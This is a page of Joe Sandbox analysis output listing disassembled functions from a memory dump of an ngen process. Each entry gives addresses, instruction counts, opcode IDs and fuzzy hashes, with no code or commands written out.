                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: 6402f4b197569be178c6228e744ae77b40f941c35f58971756fdbf1bf9bd6884
                                                • Instruction ID: 73872616c56dc1ca8ed8d146c3ca09c07431cecb420e5d16f39d94cc53c185c3
                                                • Opcode Fuzzy Hash: 6402f4b197569be178c6228e744ae77b40f941c35f58971756fdbf1bf9bd6884
                                                • Instruction Fuzzy Hash: 8911B634308606ABDB24B91D885467677D7FB81228F34853AEC92CF391E675EC418381
                                                Function 0590106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrCreateEnclave
                                                • API String ID: 0-3262589265
                                                • Opcode ID: 745b36e486a8b89c9a7d17781536ef0cad29eb18d5b35fc8eacc6064ad9dcb99
                                                • Instruction ID: 35ce512357a3eb92fab3ed6d8c5bf58f222d957544f71a79b63afbef71c3e592
                                                • Opcode Fuzzy Hash: 745b36e486a8b89c9a7d17781536ef0cad29eb18d5b35fc8eacc6064ad9dcb99
                                                • Instruction Fuzzy Hash: AE2107B16183449FC310DF1AC949A5BFBE8FBD5B50F404A1FB99497250DBB0D805DB92
                                                Function 058D739A Relevance: .7, Instructions: 705COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 022b37a781a982ad62e3b6f4bc9e20c67d877bfc92193a19cd4f6362790835cd
                                                • Instruction ID: 6ec01f384d5ef212575b588916ae8ef7a4279bfafbc05ce3010851a6739b5241
                                                • Opcode Fuzzy Hash: 022b37a781a982ad62e3b6f4bc9e20c67d877bfc92193a19cd4f6362790835cd
                                                • Instruction Fuzzy Hash: D7426B71A046169FDB19CF59C490ABEF7F2FF89214B188569D952EB340DB34EC42CBA0
                                                Function 0592A118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                • Instruction ID: 06c0d69753d0019b21f9016ad132c36dc488a5a20fae2632022241e182e494c0
                                                • Opcode Fuzzy Hash: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                • Instruction Fuzzy Hash: 9C22C1726086718FDB24CF29C454776B7F6BF44300F08885AE8878F68AD7B5E492DB64
                                                Function 059416CC Relevance: .6, Instructions: 571COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd5c846078c1c6b21ac381efe9ceca7e332f359a1bd0cefd4f60f0aa2ed6d506
                                                • Instruction ID: 6f5e5bd6bf6f7c61e6e99496cecf22361fb7705b8fb26385653147206c28abf9
                                                • Opcode Fuzzy Hash: fd5c846078c1c6b21ac381efe9ceca7e332f359a1bd0cefd4f60f0aa2ed6d506
                                                • Instruction Fuzzy Hash: 2F227C35B042168BCB19CF58C490EBAB7B6BF89314B28456DD856DB344EB34ED82DF90
                                                Function 058865D0 Relevance: .4, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5334b2aa7065f42cdf4cb6f9ce68d8bafd1e1e10ac76ac383c4e4411004fc527
                                                • Instruction ID: 77632206d046346d9dfde346b3d5d190977128fcb7fc72bda27a197547eb0020
                                                • Opcode Fuzzy Hash: 5334b2aa7065f42cdf4cb6f9ce68d8bafd1e1e10ac76ac383c4e4411004fc527
                                                • Instruction Fuzzy Hash: 81E15B716083418FC714EF29C494A6ABBE1FF99304F058A6DE899CB351EB31ED05CB92
                                                Function 05878397 Relevance: .4, Instructions: 380COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea72f7dd34294a147b7e8c78f1d059410e687082f8e76ddae83b1e422021b31f
                                                • Instruction ID: d47ef40f3f4b89a136edd848917e1e6f638247a6e44fc773ed8160568b151063
                                                • Opcode Fuzzy Hash: ea72f7dd34294a147b7e8c78f1d059410e687082f8e76ddae83b1e422021b31f
                                                • Instruction Fuzzy Hash: 0AD1B171A0020E9BCB14DF69C899ABEB3E6FF44248F058669ED56DB280E730DD40CF61
                                                Function 0588D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33f984f92fd4772ed2cf9a50f734d880ee0f3aa66a8a736cf1992f3f4966c1e6
                                                • Instruction ID: 74826b9f1262fd4b9afe665c5a82540984f7ab3da6bfacd01e549445aed59d37
                                                • Opcode Fuzzy Hash: 33f984f92fd4772ed2cf9a50f734d880ee0f3aa66a8a736cf1992f3f4966c1e6
                                                • Instruction Fuzzy Hash: 36C19E71A0520A9BDF28EF58C845BBAB7B6FF85314F188269DC15EB290D770ED41CB80
                                                Function 0589F460 Relevance: .3, Instructions: 321COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4b4d81e17e726c7b36bf41340e5367f4dcf93aba9abb02372e4d988812cb7d4
                                                • Instruction ID: 3c7ed392e6a47ffe59342b06c830905558e001f7e46993960842bfb944fa97ee
                                                • Opcode Fuzzy Hash: c4b4d81e17e726c7b36bf41340e5367f4dcf93aba9abb02372e4d988812cb7d4
                                                • Instruction Fuzzy Hash: C9C1C272A052598BCF2ECF18C494B79B7A2FB84714F1D4159EE42DB2A1EB349D41C7A0
                                                Function 05890535 Relevance: .3, Instructions: 300COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction ID: e77964ead19e9d7849b5b7cdc4203a4db4ac2ff33c61461900893301a5733d0c
                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction Fuzzy Hash: E5B1E231704649EFDF19CBA8C858BBEB7B6AF85304F184154E956D7291DB30ED41CB90
                                                Function 058A90DB Relevance: .3, Instructions: 287COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82ed62dd574f1a520473f7c183e81a6e01652f08c19c339abdf8ae28613a497
                                                • Instruction ID: 4f3fd4bec89281b1dc834521b93099570714ae4d9d0300913c6ed7e76aaea6e3
                                                • Opcode Fuzzy Hash: c82ed62dd574f1a520473f7c183e81a6e01652f08c19c339abdf8ae28613a497
                                                • Instruction Fuzzy Hash: 16A15A71A04205AFEB169F68CC45FAE7BB9AF46750F054098FE01EB2A0DB75DC018BA1
                                                Function 0587C427 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                • Instruction ID: 0d809a78e0061ab5f1ee7e24e866b8448e1dc7535e253175a6a293d09efbdf9d
                                                • Opcode Fuzzy Hash: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                • Instruction Fuzzy Hash: 70B15F70B042598BDB24DF58C894BA9B3F6BF44704F1485E9D80AEB250EB71DD85CB25
                                                Function 058AE5E7 Relevance: .3, Instructions: 278COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                • Instruction ID: df12108bb9cca385aadb9dff0f2c63bfce92ffae2e8c97025cffff0c2cd10633
                                                • Opcode Fuzzy Hash: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                • Instruction Fuzzy Hash: 56A11432E046189FEB21DB58C848FAEBBBABB45714F150965EE01EB2D0DB749D40CB91
                                                Function 058C0185 Relevance: .3, Instructions: 276COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                • Instruction ID: ba6f3d25eac641a77e5b3ac82c1f3c44c1ddfd51f9a72f10652945c9ddc1bb63
                                                • Opcode Fuzzy Hash: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                • Instruction Fuzzy Hash: B8A18E70B00619DBDB24DA69C994BBEBBA6FF44359F0040ADEE46D7281DB34EC11CB50
                                                Function 05954500 Relevance: .3, Instructions: 275COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                • Instruction ID: 61083b6807980712fb91cd539e4497e9e98ce6b1370f68d1591c74b6888f7b7b
                                                • Opcode Fuzzy Hash: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                • Instruction Fuzzy Hash: 7BA1DF72604701AFCB55DF28C980B6ABBE9FF48714F440929F989DB250C734ED91CB92
                                                Function 05889486 Relevance: .3, Instructions: 259COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f8410257aa2367191470288f4c44cdbc8f7e116d2e18a2371cd67ff9b8c94b7
                                                • Instruction ID: b94c38a21911c63943186635293a3c598c7a2090b75f493e398289d48299743a
                                                • Opcode Fuzzy Hash: 3f8410257aa2367191470288f4c44cdbc8f7e116d2e18a2371cd67ff9b8c94b7
                                                • Instruction Fuzzy Hash: 09B10774A04209CFCF25EF19D481BB9BBA1FB44258F14459AEC26DB296DB31DC46CB90
                                                Function 05881131 Relevance: .3, Instructions: 259COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c74742520358d81bd76ce56f9ef8549757a865f32fae55b0b1a7a3165e634e21
                                                • Instruction ID: d318e2f423930224abe8bda0594eb04b85f933b5f010f492dbd8f192380773b2
                                                • Opcode Fuzzy Hash: c74742520358d81bd76ce56f9ef8549757a865f32fae55b0b1a7a3165e634e21
                                                • Instruction Fuzzy Hash: 64B100756093408FD754CF28C580A6AFBF2BF88704F184A6EE99ACB352D731E945CB52
                                                Function 0593B52F Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                • Instruction ID: c27efa377c92bd3c6ee8c21a53893367289daca88049ca3dcc70bd80ccb5fb59
                                                • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                • Instruction Fuzzy Hash: EA716D35A0421ADBCB20CE64C492ABEBBEBFF44750F59455AE842EB641E734E9418B90
                                                Function 058AD090 Relevance: .2, Instructions: 217COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction ID: 87595edaaefdbe301a77955327d99bdfac177e99b38e12d1394c1bb85af59b9b
                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction Fuzzy Hash: 27817972E0521A9BEF24DF68C880BADF7B6FB85304F19816ADC16F7344D635AD408B91
                                                Function 0589C640 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 119f21c2ce867a9d95b144a2b66f88107b757f52c83327116b3c5671b6a54557
                                                • Instruction ID: ec991e97e03cf0630c20d5aa04162a30f802c71eb8aa9ba57b6573459f61cb97
                                                • Opcode Fuzzy Hash: 119f21c2ce867a9d95b144a2b66f88107b757f52c83327116b3c5671b6a54557
                                                • Instruction Fuzzy Hash: 2D71AE75905669EBCB29CF59D490BBEBBB5FF49710F18411AEC42EB250D7319C00CBA0
                                                Function 0589260B Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f36f31ea2e0e7bafb1a219a525a206ee1f448acb32198843582bcafd6967597c
                                                • Instruction ID: 7b75577a58592934f06b2525393abf558cfcda6caa5dc199b19b58855e138807
                                                • Opcode Fuzzy Hash: f36f31ea2e0e7bafb1a219a525a206ee1f448acb32198843582bcafd6967597c
                                                • Instruction Fuzzy Hash: 7B718C79704281AFC716DF28C484B2AB7E6FF84214F0885A9EC9ACB751EB34DC45CB91
                                                Function 0594903E Relevance: .2, Instructions: 186COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5ea3af8ea2f7bceee209ae0278620bf2fd0ad7205acb02331b821424c3d0888
                                                • Instruction ID: 9069d616dde9de085e5339689700b535c6eb0eca9d15e4d973fb867470db1731
                                                • Opcode Fuzzy Hash: f5ea3af8ea2f7bceee209ae0278620bf2fd0ad7205acb02331b821424c3d0888
                                                • Instruction Fuzzy Hash: 586189B1604716AFD725DF68C888FABBBA9FB88710F004619F85987240DB34AD14CF91
                                                Function 05887703 Relevance: .2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5836d282a77a390e27572e070057607584052e50d5f0d6b53f4c5bda5700763d
                                                • Instruction ID: 075d4e0b516e984d4b427634ee981c2b183aa29288c383e94ce1fdb0b73b7f9b
                                                • Opcode Fuzzy Hash: 5836d282a77a390e27572e070057607584052e50d5f0d6b53f4c5bda5700763d
                                                • Instruction Fuzzy Hash: F4613075B04606ABDB18EF68C484ABDFBB6FF84304F24816AD819E7300DB35AD45CB94
                                                Function 058FD5D0 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                • Instruction ID: 7479d69d7c6feb15ef6e072b5c7f54baa07c9690f35b40f8b8b8edf65d07ed56
                                                • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                • Instruction Fuzzy Hash: E051BF762053069BCB11AF688C44ABB77A6FF88644F144829FF45CB251EB39CC56C7E2
                                                Function 058BB570 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5245079f5458c6f8a8d62f9a455bacd029ea0f766dea3a32845d8d7627561f98
                                                • Instruction ID: 7ec352f8d49498a077aa8d4565bd675a3fed9780a7bd8b9a268f34bbd79d9998
                                                • Opcode Fuzzy Hash: 5245079f5458c6f8a8d62f9a455bacd029ea0f766dea3a32845d8d7627561f98
                                                • Instruction Fuzzy Hash: DD518271214344ABE720EF18CD85F6A7BA8EB89724F10062DFE56D7191DB30DC01CBA2
                                                Function 058A95DA Relevance: .2, Instructions: 160COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2ac5a0cbe77bc6146844377f528e5853f16ab1f555122f946bf9d04c51bb95b
                                                • Instruction ID: 56dbc153abddb5e78f259c7eb9e7b4ca093c5b66e459f834d412e74783d0b254
                                                • Opcode Fuzzy Hash: f2ac5a0cbe77bc6146844377f528e5853f16ab1f555122f946bf9d04c51bb95b
                                                • Instruction Fuzzy Hash: 5E518C71A04308ABEB219FA8CC85BADBBB5FF46344F20412EE995E7291DB719C449B11
                                                Function 05893740 Relevance: .2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5848bddf37cd1208ca92b38463a1ac07ce1b04c933ca5b934506d13a6c7b2b5b
                                                • Instruction ID: 8a443f483dda8298c41fd1a85bffa81c6fe68e68aea7f3c4e6cfcd87012261a8
                                                • Opcode Fuzzy Hash: 5848bddf37cd1208ca92b38463a1ac07ce1b04c933ca5b934506d13a6c7b2b5b
                                                • Instruction Fuzzy Hash: 69510179A0461AAFCB19CF68C485AA9B7B1FF44710F088A65EC55DB740EB34ED91C7C0
                                                Function 058BE443 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d425d17b17edcd2955328a6127eabf3884ae6d78815aafae0e40aa9e84944caa
                                                • Instruction ID: 1a58baa84811fe3d1e5417b020af870165c5abff5804cedccc39b6988ea1a3a9
                                                • Opcode Fuzzy Hash: d425d17b17edcd2955328a6127eabf3884ae6d78815aafae0e40aa9e84944caa
                                                • Instruction Fuzzy Hash: 4B515D71200A04DFDB25EF68C984EAAB7BEFF08744F54086AEA56D7260DB74ED40CB51
                                                Function 05887152 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c9f67b3e992354f441c2159f46f50271f3f812e253b9dce4c7950129c71b802
                                                • Instruction ID: 4bca47630731e392215363f9275480f6daaaea274c56fcb2468d429c93d25a32
                                                • Opcode Fuzzy Hash: 9c9f67b3e992354f441c2159f46f50271f3f812e253b9dce4c7950129c71b802
                                                • Instruction Fuzzy Hash: FF51DC35A04609EBEB15EB68C948BBDBBB6FF45715F204029EC13D3690EB74AD11CB81
                                                Function 058A45B1 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction ID: 3438a79a5518ca16de26cd39f7faa4328937849c8d8b63096c42ed5fb6b8afac
                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction Fuzzy Hash: 38518A76E0424EABEF16DB98C440BAEBBB5AF45754F044069ED01EB260D7B4DD44CBA0
                                                Function 058851ED Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 701c0fe82aa182cace1ddd5e041d58dfb0a027b3baf426eab29c9dd848030241
                                                • Instruction ID: f0f74d4a8ddf37e678caf9867bc465af5d9c084013e796c80f1a39536e3e5f38
                                                • Opcode Fuzzy Hash: 701c0fe82aa182cace1ddd5e041d58dfb0a027b3baf426eab29c9dd848030241
                                                • Instruction Fuzzy Hash: 2B517A71B05719EBEB21EAA8D848BFDB3B6FB05719F040419EC06E7241DBB5AD408B51
                                                Function 058BF71F Relevance: .1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e25dd678c5bb3b7511eaa7a423346c7d3380c930e0581f2927a73cbaa9438b2
                                                • Instruction ID: bd90ebfebcdf1a21dc3c9f2cf300029c0e1755d5c5334b081a89406592ae6e3c
                                                • Opcode Fuzzy Hash: 3e25dd678c5bb3b7511eaa7a423346c7d3380c930e0581f2927a73cbaa9438b2
                                                • Instruction Fuzzy Hash: F641B976E05229ABDB21DB988844AFFB7BDAF45754F0501A9ED01F7300DA34DE0087D5
                                                Function 059535D7 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                • Instruction ID: 5588da6e2e4935b6db1dbc8ba08b909d23c3105de6f31df0cf5ed1a114bbf04b
                                                • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                • Instruction Fuzzy Hash: 25517C71601606EFCB15CF14C581A66BBBAFF45354F1984AAE808DF222E371E959CB90
                                                Function 058BA430 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78fa8883e557bae077329b76e50eb5026d8e56bd1bff4a26dd1496b60a535f0f
